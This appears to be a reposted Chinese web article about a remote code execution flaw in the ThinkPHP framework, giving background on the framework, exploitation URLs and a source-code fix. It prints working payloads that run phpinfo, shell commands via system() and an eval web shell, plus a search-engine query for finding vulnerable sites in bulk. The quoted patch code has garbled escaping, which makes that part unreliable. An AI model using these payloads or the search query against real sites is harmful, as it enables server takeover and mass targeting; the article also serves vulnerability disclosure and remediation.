ThinkPHP框架任意代碼執行漏洞的利用及其修復方法

2020-03-22 19:34:15

字體：大中小

來源：轉載

供稿：網友

ThinkPHP是國內著名的開源的html' target='_blank'>PHP框架，是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的。最早誕生于2006年初，原名FCS，2007年元旦正式更名為ThinkPHP，并且遵循Apache2開源協議發布。早期的思想架構來源于Struts，后來經過不斷改進和完善，同時也借鑒了國外很多優秀的框架和模式，使用面向對象的開發結構和MVC模式，融合了Struts的Action和Dao思想和JSP的TagLib（標簽庫）、RoR的ORM映射和ActiveRecord模式，封裝了CURD和一些常用操作，單一入口模式等，在模版引擎、緩存機制、認證機制和擴展性方面均有獨特的表現.

然而近期thinkphp框架爆出了一個任意代碼執行漏洞，其危害性相當的高,漏洞利用方法如下：

index.php/module/aciton/param1/${@print(THINK_VERSION)}index.php/module/aciton/param1/${@function_all()}其中的function_all代表任何函數，比如:
index.php/module/aciton/param1/${@phpinfo()}就可以獲取服務器的系統配置信息等。index.php/module/action/param1/{${system($_GET['x'])}} x=ls -al可以列出網站文件列表index.php/module/action/param1/{${eval($_POST[s])}}就可以直接執行一句話代碼，用菜刀直接連接.這樣黑客們就可以直接通過google批量搜索關鍵字：thinkphp intitle:系統發生錯誤來獲取更多使用thinkphp框架的網站列表。可見其危害性相當的大。

thinkphp框架執行任意代碼漏洞修復方法：

用戶可下載官方發布的補丁：

http://code.google.com/p/thinkphp/source/detail spec=svn2904&r=2838

或者或者直接修改源碼：將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2";', implode($depr,$paths));修改為：$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2';', implode($depr,$paths));將preg_replace第二個參數中的雙引號改為單引號，防止其中的php變量語法被解析執行。

注：本文僅供學習參考使用，請不要用于非法用途。PHP教程

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

上一篇：ThinkPHP表單令牌錯誤的相關解決方法分析

下一篇：php通過變通方法檢測系統的文件夾路徑編碼